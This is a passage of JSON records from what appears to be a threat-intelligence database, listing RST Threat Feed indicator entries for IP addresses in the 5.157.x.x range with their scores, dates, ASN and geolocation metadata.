"history": [], "edition": 1, "hashmap": [{"key": "asn", "hash": "4ce3cd3bf144af5ba983303293416789"}, {"key": "bulletinFamily", "hash": "e03daa7651c34372b0bf8c442bb00813"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "description", "hash": "7d6eda9261c226985510a1ef7b983fc5"}, {"key": "domain", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "fp", "hash": "c923ad45656a014eb21907f615f1e97f"}, {"key": "geodata", "hash": "e1f48e147806d10e6da0f0d316330810"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "iocScore", "hash": "c0fb42a3507847f7bddfbcddbca92e0e"}, {"key": "iocType", "hash": "957b527bcfbad2e80f58d20683931435"}, {"key": "ip", "hash": "5294f1bc7013fc24f156aa7bba7211af"}, {"key": "modified", "hash": "250c0db3350aca16f346c64d5d43f1bf"}, {"key": "published", "hash": "d277659b561c00f79f6620e2a0e2193b"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ecfdd35b9632d35ab17dbe9c46491f14"}, {"key": "tags", "hash": "db34099e531f5ecc1dd7c5e13c35811a"}, {"key": "threat", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "8fbfef6d73e2d8645533a1a6ac2a34c9"}, {"key": "type", "hash": "d674dfcd8b4db6762bcb3667316d3bb9"}, {"key": "url", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "whois", "hash": "d41d8cd98f00b204e9800998ecf8427e"}], "hash": "edc116f286522023ce20a96dd673858643e0d02e11ed14db1b9fd5b9ae4d6652", "viewCount": 0, "enchantments": {}, "objectVersion": "1.3", "iocType": "ip", "ip": ["5.157.17.22"], "domain": [], "url": [], "iocScore": {"ioc_frequency": 0.62, "ioc_src": 55.84, "ioc_tags": 0.8, "ioc_total": 27.0}, "tags": ["generic"], "fp": {"alarm": "false", "descr": ""}, "whois": {}, "geodata": {"city": "", "country": "United States", "region": ""}, "asn": {"cloud": "", "domains": 21677, "firstip": {"netv4": "5.157.17.0", "num": "94179584"}, "isp": "AS41564", "lastip": {"netv4": "5.157.17.255", "num": "94179839"}, "num": 41564, "org": ""}, "threat": []}, {"id": "RST:748D7E3C-7C8D-3CB2-A96E-F32BF87C2CBE", "bulletinFamily": "ioc", "title": "RST Threat feed. IOC: 5.157.17.44", "description": "Found **5[.]157.17.44** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **44**.\n First seen: 2021-03-11T03:00:00, Last seen: 2021-03-11T03:00:00.\n IOC tags: **generic**.\nASN 41564: (First IP 5.157.17.0, Last IP 5.157.17.255).\nASN Name \"AS41564\" and Organisation \"\".\nASN hosts 21677 domains.\nGEO IP information: City \"\", Country \"United States\".\n[https://rstcloud.net/](https://rstcloud.net/)", "published": "2021-03-11T00:00:00", "modified": "2021-03-11T00:00:00", "cvss": {}, "href": "", "reporter": "RST Threat Feed", "references": [], "cvelist": [], "type": "rst", "lastseen": "2021-03-11T00:00:00", "history": [], "edition": 1, "hashmap": [{"key": "asn", "hash": "4ce3cd3bf144af5ba983303293416789"}, {"key": "bulletinFamily", "hash": "e03daa7651c34372b0bf8c442bb00813"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "description", "hash": "cf14e55e6b1e4f8ae6137264c82368c4"}, {"key": "domain", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "fp", "hash": "c923ad45656a014eb21907f615f1e97f"}, {"key": "geodata", "hash": "e1f48e147806d10e6da0f0d316330810"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "iocScore", "hash": "13ece64b43b601d97b022f32f351e264"}, {"key": "iocType", "hash": "957b527bcfbad2e80f58d20683931435"}, {"key": "ip", "hash": "43ac865d91f484211df4d17505dd1cbc"}, {"key": "modified", "hash": "d277659b561c00f79f6620e2a0e2193b"}, {"key": "published", "hash": "d277659b561c00f79f6620e2a0e2193b"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ecfdd35b9632d35ab17dbe9c46491f14"}, {"key": "tags", "hash": "db34099e531f5ecc1dd7c5e13c35811a"}, {"key": "threat", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "2591a9eae908bfb1c8d6614cdb6fdb9b"}, {"key": "type", "hash": "d674dfcd8b4db6762bcb3667316d3bb9"}, {"key": "url", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "whois", "hash": "d41d8cd98f00b204e9800998ecf8427e"}], "hash": "046c6da668c021f18444b20e62f050506c9169476e9d39cde36045780acc74b6", "viewCount": 0, "enchantments": {}, "objectVersion": "1.3", "iocType": "ip", "ip": ["5.157.17.44"], "domain": [], "url": [], "iocScore": {"ioc_frequency": 1.0, "ioc_src": 55.84, "ioc_tags": 0.8, "ioc_total": 44.0}, "tags": ["generic"], "fp": {"alarm": "false", "descr": ""}, "whois": {}, "geodata": {"city": "", "country": "United States", "region": ""}, "asn": {"cloud": "", "domains": 21677, "firstip": {"netv4": "5.157.17.0", "num": "94179584"}, "isp": "AS41564", "lastip": {"netv4": "5.157.17.255", "num": "94179839"}, "num": 41564, "org": ""}, "threat": []}, {"id": "RST:A7539111-5C35-3B04-ADEB-4A07C94EDE3A", "bulletinFamily": "ioc", "title": "RST Threat feed. IOC: 5.157.27.177", "description": "Found **5[.]157.27.177** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **44**.\n First seen: 2021-03-11T03:00:00, Last seen: 2021-03-11T03:00:00.\n IOC tags: **generic**.\nASN 41564: (First IP 5.157.27.0, Last IP 5.157.27.255).\nASN Name \"AS41564\" and Organisation \"\".\nASN hosts 21677 domains.\nGEO IP information: City \"\", Country \"United States\".\n[https://rstcloud.net/](https://rstcloud.net/)", "published": "2021-03-11T00:00:00", "modified": "2021-03-11T00:00:00", "cvss": {}, "href": "", "reporter": "RST Threat Feed", "references": [], "cvelist": [], "type": "rst", "lastseen": "2021-03-11T00:00:00", "history": [], "edition": 1, "hashmap": [{"key": "asn", "hash": "5ce2329e29bd19664b146279097bb90a"}, {"key": "bulletinFamily", "hash": "e03daa7651c34372b0bf8c442bb00813"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "description", "hash": "92dd1d7d28024545bcd83d897d3cfa1b"}, {"key": "domain", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "fp", "hash": "c923ad45656a014eb21907f615f1e97f"}, {"key": "geodata", "hash": "e1f48e147806d10e6da0f0d316330810"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "iocScore", "hash": "13ece64b43b601d97b022f32f351e264"}, {"key": "iocType", "hash": "957b527bcfbad2e80f58d20683931435"}, {"key": "ip", "hash": "a827a61c19162226aaaee0456fade996"}, {"key": "modified", "hash": "d277659b561c00f79f6620e2a0e2193b"}, {"key": "published", "hash": "d277659b561c00f79f6620e2a0e2193b"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ecfdd35b9632d35ab17dbe9c46491f14"}, {"key": "tags", "hash": "db34099e531f5ecc1dd7c5e13c35811a"}, {"key": "threat", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "ad37c31d5a7d5f7c527194e057eff77b"}, {"key": "type", "hash": "d674dfcd8b4db6762bcb3667316d3bb9"}, {"key": "url", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "whois", "hash": "d41d8cd98f00b204e9800998ecf8427e"}], "hash": "87ff035447270f2339f7f03d104dbedb284b0971a658d6fc25322bac4423b68f", "viewCount": 0, "enchantments": {}, "objectVersion": "1.3", "iocType": "ip", "ip": ["5.157.27.177"], "domain": [], "url": [], "iocScore": {"ioc_frequency": 1.0, "ioc_src": 55.84, "ioc_tags": 0.8, "ioc_total": 44.0}, "tags": ["generic"], "fp": {"alarm": "false", "descr": ""}, "whois": {}, "geodata": {"city": "", "country": "United States", "region": ""}, "asn": {"cloud": "", "domains": 21677, "firstip": {"netv4": "5.157.27.0", "num": "94182144"}, "isp": "AS41564", "lastip": {"netv4": "5.157.27.255", "num": "94182399"}, "num": 41564, "org": ""}, "threat": []}, {"id": "RST:BC93F4A3-334E-3DC6-9D66-ED4792DD9894", "bulletinFamily": "ioc", "title": "RST Threat feed. IOC: 5.157.27.124", "description": "Found **5[.]157.27.124** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **44**.\n First seen: 2021-03-11T03:00:00, Last seen: 2021-03-11T03:00:00.\n IOC tags: **generic**.\nASN 41564: (First IP 5.157.27.0, Last IP 5.157.27.255).\nASN Name \"AS41564\" and Organisation \"\".\nASN hosts 21677 domains.\nGEO IP information: City \"\", Country \"United States\".\n[https://rstcloud.net/](https://rstcloud.net/)", "published": "2021-03-11T00:00:00", "modified": "2021-03-11T00:00:00", "cvss": {}, "href": "", "reporter": "RST Threat Feed", "references": [], "cvelist": [], "type": "rst", "lastseen": "2021-03-11T00:00:00", "history": [], "edition": 1, "hashmap": [{"key": "asn", "hash": "5ce2329e29bd19664b146279097bb90a"}, {"key": "bulletinFamily", "hash": "e03daa7651c34372b0bf8c442bb00813"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "description", "hash": "33cc60bf8ee05c51efc817a262bb62b4"}, {"key": "domain", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "fp", "hash": "c923ad45656a014eb21907f615f1e97f"}, {"key": "geodata", "hash": "e1f48e147806d10e6da0f0d316330810"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "iocScore", "hash": "13ece64b43b601d97b022f32f351e264"}, {"key": "iocType", "hash": "957b527bcfbad2e80f58d20683931435"}, {"key": "ip", "hash": "aaee9440e5ac6805f68e7cb9d5ca0fc4"}, {"key": "modified", "hash": "d277659b561c00f79f6620e2a0e2193b"}, {"key": "published", "hash": "d277659b561c00f79f6620e2a0e2193b"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ecfdd35b9632d35ab17dbe9c46491f14"}, {"key": "tags", "hash": "db34099e531f5ecc1dd7c5e13c35811a"}, {"key": "threat", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "6c2dbd502371c0c2d5118c2b2e24eb47"}, {"key": "type", "hash": "d674dfcd8b4db6762bcb3667316d3bb9"}, {"key": "url", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "whois", "hash": "d41d8cd98f00b204e9800998ecf8427e"}], "hash": "5430a8ec0148709ddafb8c94dcd2ec772325a00eb3704cdc6909f3114aa76fe7", "viewCount": 0, "enchantments": {}, "objectVersion": "1.3", "iocType": "ip", "ip": ["5.157.27.124"], "domain": [], "url": [], "iocScore": {"ioc_frequency": 1.0, "ioc_src": 55.84, "ioc_tags": 0.8, "ioc_total": 44.0}, "tags": ["generic"], "fp": {"alarm": "false", "descr": ""}, "whois": {}, "geodata": {"city": "", "country": "United States", "region": ""}, "asn": {"cloud": "", "domains": 21677, "firstip": {"netv4": "5.157.27.0", "num": "94182144"}, "isp": "AS41564", "lastip": {"netv4": "5.157.27.255", "num": "94182399"}, "num": 41564, "org": ""}, "threat": []}, {"id": "RST:AD3CB5BE-FCFE-37A8-98B7-C2F4D5DBE9EB", "bulletinFamily": "ioc", "title": "RST Threat feed. IOC: 5.157.56.2", "description": "Found **5[.]157.56.2** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **44**.\n First seen: 2020-09-06T03:00:00, Last seen: 2020-09-06T03:00:00.\n IOC tags: **generic**.\nASN 41564: (First IP 5.157.56.0, Last IP 5.157.56.255).\nASN Name \"AS41564\" and Organisation \"\".\nASN hosts 21677 domains.\nGEO IP information: City \"\", Country \"United States\".\n[https://rstcloud.net/](https://rstcloud.net/)", "published": "2021-03-11T00:00:00", "modified": "2020-09-06T00:00:00", "cvss": {}, "href": "", "reporter": "RST Threat Feed", "references": [], "cvelist": [], "type": "rst", "lastseen": "2020-09-06T00:00:00", "history": [], "edition": 1, "hashmap": [{"key": "asn", "hash": "bdbf43838c5e919d32918516f029149f"}, {"key": "bulletinFamily", "hash": "e03daa7651c34372b0bf8c442bb00813"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "description", "hash": "25a2bd0e4c634f383fb9d8c330c04fe1"}, {"key": "domain", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "fp", "hash": "c923ad45656a014eb21907f615f1e97f"}, {"key": "geodata", "hash": "e1f48e147806d10e6da0f0d316330810"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "iocScore", "hash": "13ece64b43b601d97b022f32f351e264"}, {"key": "iocType", "hash": "957b527bcfbad2e80f58d20683931435"}, {"key": "ip", "hash": "d68a90a4df07b62e9439a49aa0a15d16"}, {"key": "modified", "hash": "8b9d824e654713d897d59957e2bfd19e"}, {"key": "published", "hash": "d277659b561c00f79f6620e2a0e2193b"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ecfdd35b9632d35ab17dbe9c46491f14"}, {"key": "tags", "hash": "db34099e531f5ecc1dd7c5e13c35811a"}, {"key": "threat", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "08b6074ccd201e351d460112f62c5722"}, {"key": "type", "hash": "d674dfcd8b4db6762bcb3667316d3bb9"}, {"key": "url", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "whois", "hash": "d41d8cd98f00b204e9800998ecf8427e"}], "hash": "0e6b7e9ed3f49b2360ac352f47f0aa52b6436d3be54ddd125851b981b9381e62", "viewCount": 0, "enchantments": {}, "objectVersion": "1.3", "iocType": "ip", "ip": ["5.157.56.2"], "domain": [], "url": [], "iocScore": {"ioc_frequency": 1.0, "ioc_src": 55.84, "ioc_tags": 0.8, "ioc_total": 44.0}, "tags": ["generic"], "fp": {"alarm": "false", "descr": ""}, "whois": {}, "geodata": {"city": "", "country": "United States", "region": ""}, "asn": {"cloud": "", "domains": 21677, "firstip": {"netv4": "5.157.56.0", "num": "94189568"}, "isp": "AS41564", "lastip": {"netv4": "5.157.56.255", "num": "94189823"}, "num": 41564, "org": ""}, "threat": []}, {"id": "RST:EDA0E06E-17E5-3945-8706-378D714778B1", "bulletinFamily": "ioc", "title": "RST Threat feed. IOC: 5.157.56.141", "description": "Found **5[.]157.56.141** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **44**.\n First seen: 2021-03-05T03:00:00, Last seen: 2021-03-05T03:00:00.\n IOC tags: **generic**.\nASN 41564: (First IP 5.157.56.0, Last IP 5.157.56.255).\nASN Name \"AS41564\" and Organisation \"\".\nASN hosts 21677 domains.\nGEO IP information: City \"\", Country \"United States\".\n[https://rstcloud.net/](https://rstcloud.net/)", "published": "2021-03-11T00:00:00", "modified": "2021-03-05T00:00:00", "cvss": {}, "href": "", "reporter": "RST Threat Feed", "references": [], "cvelist": [], "type": "rst", "lastseen": "2021-03-05T00:00:00", "history": [], "edition": 1, "hashmap": [{"key": "asn", "hash": "bdbf43838c5e919d32918516f029149f"}, {"key": "bulletinFamily", "hash": "e03daa7651c34372b0bf8c442bb00813"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "description", "hash": "af36ca14371ecf6579cd299ccb141a6a"}, {"key": "domain", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "fp", "hash": "c923ad45656a014eb21907f615f1e97f"}, {"key": "geodata", "hash": "e1f48e147806d10e6da0f0d316330810"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "iocScore", "hash": "13ece64b43b601d97b022f32f351e264"}, {"key": "iocType", "hash": "957b527bcfbad2e80f58d20683931435"}, {"key": "ip", "hash": "332a5f585b70fcce48cf1115cfe10556"}, {"key": "modified", "hash": "c11e53af4422bbcd8c009d0df9727b6e"}, {"key": "published", "hash": "d277659b561c00f79f6620e2a0e2193b"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ecfdd35b9632d35ab17dbe9c46491f14"}, {"key": "tags", "hash": "db34099e531f5ecc1dd7c5e13c35811a"}, {"key": "threat", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "8016c33b8cfa7b7c0d52edd978d81119"}, {"key": "type", "hash": "d674dfcd8b4db6762bcb3667316d3bb9"}, {"key": "url", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "whois", "hash": "d41d8cd98f00b204e9800998ecf8427e"}], "hash": "67ebb87729f95fdde3223814a4ba4eefd0a5e2a1454fc6195be7b777b7c7dae9", "viewCount": 0, "enchantments": {}, "objectVersion": "1.3", "iocType": "ip", "ip": ["5.157.56.141"], "domain": [], "url": [], "iocScore": {"ioc_frequency": 1.0, "ioc_src": 55.84, "ioc_tags": 0.8, "ioc_total": 44.0}, "tags": ["generic"], "fp": {"alarm": "false", "descr": ""}, "whois": {}, "geodata": {"city": "", "country": "United States", "region": ""}, "asn": {"cloud": "", "domains": 21677, "firstip": {"netv4": "5.157.56.0", "num": "94189568"}, "isp": "AS41564", "lastip": {"netv4": "5.157.56.255", "num": "94189823"}, "num": 41564, "org": ""}, "threat": []}, {"id": "RST:37293F16-9128-3072-A7FC-2174B48F1DA6", "bulletinFamily": "ioc", "title": "RST Threat feed. IOC: 5.157.56.216", "description": "Found **5[.]157.56.216** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **44**.\n First seen: 2021-03-05T03:00:00, Last seen: 2021-03-05T03:00:00.\n IOC tags: **generic**.\nASN 41564: (First IP 5.157.56.0, Last IP 5.157.56.255).\nASN Name \"AS41564\" and Organisation \"\".\nASN hosts 21677 domains.\nGEO IP information: City \"\", Country \"United States\".\n[https://rstcloud.net/](https://rstcloud.net/)", "published": "2021-03-11T00:00:00", "modified": "2021-03-05T00:00:00", "cvss": {}, "href": "", "reporter": "RST Threat Feed", "references": [], "cvelist": [], "type": "rst", "lastseen": "2021-03-05T00:00:00", "history": [], "edition": 1, "hashmap": [{"key": "asn", "hash": "bdbf43838c5e919d32918516f029149f"}, {"key": "bulletinFamily", "hash": "e03daa7651c34372b0bf8c442bb00813"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "description", "hash": "638ae9f2df0caf231df8668cc6f5ea87"}, {"key": "domain", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "fp", "hash": "c923ad45656a014eb21907f615f1e97f"}, {"key": "geodata", "hash": "e1f48e147806d10e6da0f0d316330810"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "iocScore", "hash": "13ece64b43b601d97b022f32f351e264"}, {"key": "iocType", "hash": "957b527bcfbad2e80f58d20683931435"}, {"key": "ip", "hash": "e94966db99d3ba424010592803d8963b"}, {"key": "modified", "hash": "c11e53af4422bbcd8c009d0df9727b6e"}, {"key": "published", "hash": "d277659b561c00f79f6620e2a0e2193b"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ecfdd35b9632d35ab17dbe9c46491f14"}, {"key": "tags", "hash": "db34099e531f5ecc1dd7c5e13c35811a"}, {"key": "threat", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "a84a4ff73eba38ff1974ba7950e3afca"}, {"key": "type", "hash": "d674dfcd8b4db6762bcb3667316d3bb9"}, {"key": "url", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "whois", "hash": "d41d8cd98f00b204e9800998ecf8427e"}], "hash": "c4cb971b9684e86764cf5a4163477f8df0a5e94e855eeb8ce23d79b428fc1bd8", "viewCount": 0, "enchantments": {}, "objectVersion": "1.3", "iocType": "ip", "ip": ["5.157.56.216"], "domain": [], "url": [], "iocScore": {"ioc_frequency": 1.0, "ioc_src": 55.84, "ioc_tags": 0.8, "ioc_total": 44.0}, "tags": ["generic"], "fp": {"alarm": "false", "descr": ""}, "whois": {}, "geodata": {"city": "", "country": "United States", "region": ""}, "asn": {"cloud": "", "domains": 21677, "firstip": {"netv4": "5.157.56.0", "num": "94189568"}, "isp": "AS41564", "lastip": {"netv4": "5.157.56.255", "num": "94189823"}, "num": 41564, "org": ""}, "threat": []}, {"id": "RST:0A92E3E1-C9D8-3102-AE44-7C44A9A6E8FF", "bulletinFamily": "ioc", "title": "RST Threat feed. IOC: 5.157.56.244", "description": "Found **5[.]157.56.244** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **44**.\n First seen: 2021-03-05T03:00:00, Last seen: 2021-03-05T03:00:00.\n IOC tags: **generic**.\nASN 41564: (First IP 5.157.56.0, Last IP 5.157.56.255).\nASN Name \"AS41564\" and Organisation \"\".\nASN hosts 21677 domains.\nGEO IP information: City \"\", Country \"United States\".\n[https://rstcloud.net/](https://rstcloud.net/)", "published": "2021-03-11T00:00:00", "modified": "2021-03-05T00:00:00", "cvss": {}, "href": "", "reporter": "RST Threat Feed", "references": [], "cvelist": [], "type": "rst", "lastseen": "2021-03-05T00:00:00", "history": [], "edition": 1, "hashmap": [{"key": "asn", "hash": "bdbf43838c5e919d32918516f029149f"}, {"key": "bulletinFamily", "hash": "e03daa7651c34372b0bf8c442bb00813"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "description", "hash": "5707de08f6463501c0e6e4c8eeb56b30"}, {"key": "domain", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "fp", "hash": "c923ad45656a014eb21907f615f1e97f"}, {"key": "geodata", "hash": "e1f48e147806d10e6da0f0d316330810"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "iocScore", "hash": "13ece64b43b601d97b022f32f351e264"}, {"key": "iocType", "hash": "957b527bcfbad2e80f58d20683931435"}, {"key": "ip", "hash": "e0cee16ea5515b1e66cdee31c74c8c76"}, {"key": "modified", "hash": "c11e53af4422bbcd8c009d0df9727b6e"}, {"key": "published", "hash": "d277659b561c00f79f6620e2a0e2193b"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ecfdd35b9632d35ab17dbe9c46491f14"}, {"key": "tags", "hash": "db34099e531f5ecc1dd7c5e13c35811a"}, {"key": "threat", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "ec4da0ee4229e489894504e98f3a8fd7"}, {"key": "type", "hash": "d674dfcd8b4db6762bcb3667316d3bb9"}, {"key": "url", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "whois", "hash": "d41d8cd98f00b204e9800998ecf8427e"}], "hash": "e8ebd810ef9e00606a8f9bd99c83f1999fe233b23aafcba9b627becd95c1fd5d", "viewCount": 0, "enchantments": {}, "objectVersion": "1.3", "iocType": "ip", "ip": ["5.157.56.244"], "domain": [], "url": [], "iocScore": {"ioc_frequency": 1.0, "ioc_src": 55.84, "ioc_tags": 0.8, "ioc_total": 44.0}, "tags": ["generic"], "fp": {"alarm": "false", "descr": ""}, "whois": {}, "geodata": {"city": "", "country": "United States", "region": ""}, "asn": {"cloud": "", "domains": 21677, "firstip": {"netv4": "5.157.56.0", "num": "94189568"}, "isp": "AS41564", "lastip": {"netv4": "5.157.56.255", "num": "94189823"}, "num": 41564, "org": ""}, "threat": []}, {"id": "RST:C4BB20C1-6C1B-3FB7-9644-32035E7D823A", "bulletinFamily": "ioc", "title": "RST Threat feed. IOC: 5.157.58.90", "description": "Found **5[.]157.58.90** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **44**.\n First seen: 2021-03-05T03:00:00, Last seen: 2021-03-05T03:00:00.\n IOC tags: **generic**.\nASN 41564: (First IP 5.157.58.0, Last IP 5.157.63.255).\nASN Name \"AS41564\" and Organisation \"\".\nASN hosts 21677 domains.\nGEO IP information: City \"Amsterdam\", Country \"Netherlands\".\n[https://rstcloud.net/](https://rstcloud.net/)", "published": "2021-03-11T00:00:00", "modified": "2021-03-05T00:00:00", "cvss": {}, "href": "", "reporter": "RST Threat Feed", "references": [], "cvelist": [], "type": "rst", "lastseen": "2021-03-05T00:00:00", "history": [], "edition": 1, "hashmap": [{"key": "asn", "hash": "3bcaa00b4f4c028a619e463ac20e9e4f"}, {"key": "bulletinFamily", "hash": "e03daa7651c34372b0bf8c442bb00813"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "description", "hash": "fb1e37d5899f42f7350b170a79ed496d"}, {"key": "domain", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "fp", "hash": "c923ad45656a014eb21907f615f1e97f"}, {"key": "geodata", "hash": "134d27a72b96eb0a8d58caecda4cb44e"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "iocScore", "hash": "13ece64b43b601d97b022f32f351e264"}, {"key": "iocType", "hash": "957b527bcfbad2e80f58d20683931435"}, {"key": "ip", "hash": "5725067543a0a324ff95e9f1ba461ca6"}, {"key": "modified", "hash": "c11e53af4422bbcd8c009d0df9727b6e"}, {"key": "published", "hash": "d277659b561c00f79f6620e2a0e2193b"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ecfdd35b9632d35ab17dbe9c46491f14"}, {"key": "tags", "hash": "db34099e531f5ecc1dd7c5e13c35811a"}, {"key": "threat", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "0a5d7049b47889d2d1cf0caa5bdaf556"}, {"key": "type", "hash": "d674dfcd8b4db6762bcb3667316d3bb9"}, {"key": "url", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "whois", "hash": "d41d8cd98f00b204e9800998ecf8427e"}], "hash": "1fa5be4c28140c2716b0a1f735a1301148a652db1883083a7dd8eb266da5e5ff", "viewCount": 0, "enchantments": {}, "objectVersion": "1.3", "iocType": "ip", "ip": ["5.157.58.90"], "domain": [], "url": [], "iocScore": {"ioc_frequency": 1.0, "ioc_src": 55.84, "ioc_tags": 0.8, "ioc_total": 44.0}, "tags": ["generic"], "fp": {"alarm": "false", "descr": ""}, "whois": {}, "geodata": {"city": "Amsterdam", "country": "Netherlands", "region": "North Holland"}, "asn": {"cloud": "", "domains": 21677, "firstip": {"netv4": "5.157.58.0", "num": "94190080"}, "isp": "AS41564", "lastip": {"netv4": "5.157.63.255", "num": "94191615"}, "num": 41564, "org": ""}, "threat": []}, {"id": "RST:B78C625B-3188-3D37-84F9-A461CE8F8383", "bulletinFamily": "ioc", "title": "RST Threat feed. IOC: 5.157.60.163", "description": "Found **5[.]157.60.163** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **44**.\n First seen: 2021-03-05T03:00:00, Last seen: 2021-03-05T03:00:00.\n IOC tags: **generic**.\nASN 41564: (First IP 5.157.58.0, Last IP 5.157.63.255).\nASN Name \"AS41564\" and Organisation \"\".\nASN hosts 21677 domains.\nGEO IP information: City \"Amsterdam\", Country \"Netherlands\".\n[https://rstcloud.net/](https://rstcloud.net/)", "published": "2021-03-11T00:00:00", "modified": "2021-03-05T00:00:00", "cvss": {}, "href": "", "reporter": "RST Threat Feed", "references": [], "cvelist": [], "type": "rst", "lastseen": "2021-03-05T00:00:00", "history": [], "edition": 1, "hashmap": [{"key": "asn", "hash": "3bcaa00b4f4c028a619e463ac20e9e4f"}, {"key": "bulletinFamily", "hash": "e03daa7651c34372b0bf8c442bb00813"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "description", "hash": "bdeb1b5b1d858625103cb63611d233b1"}, {"key": "domain", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "fp", "hash": "c923ad45656a014eb21907f615f1e97f"}, {"key": "geodata", "hash": "134d27a72b96eb0a8d58caecda4cb44e"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "iocScore", "hash": "13ece64b43b601d97b022f32f351e264"}, {"key": "iocType", "hash": "957b527bcfbad2e80f58d20683931435"}, {"key": "ip", "hash": "d5ef07c071254a4bb8514a7f976ec308"}, {"key": "modified", "hash": "c11e53af4422bbcd8c009d0df9727b6e"}, {"key": "published", "hash": "d277659b561c00f79f6620e2a0e2193b"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ecfdd35b9632d35ab17dbe9c46491f14"}, {"key": "tags", "hash": "db34099e531f5ecc1dd7c5e13c35811a"}, {"key": "threat", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "c3726735aca201e390e1ca8f5eba87f3"}, {"key": "type", "hash": 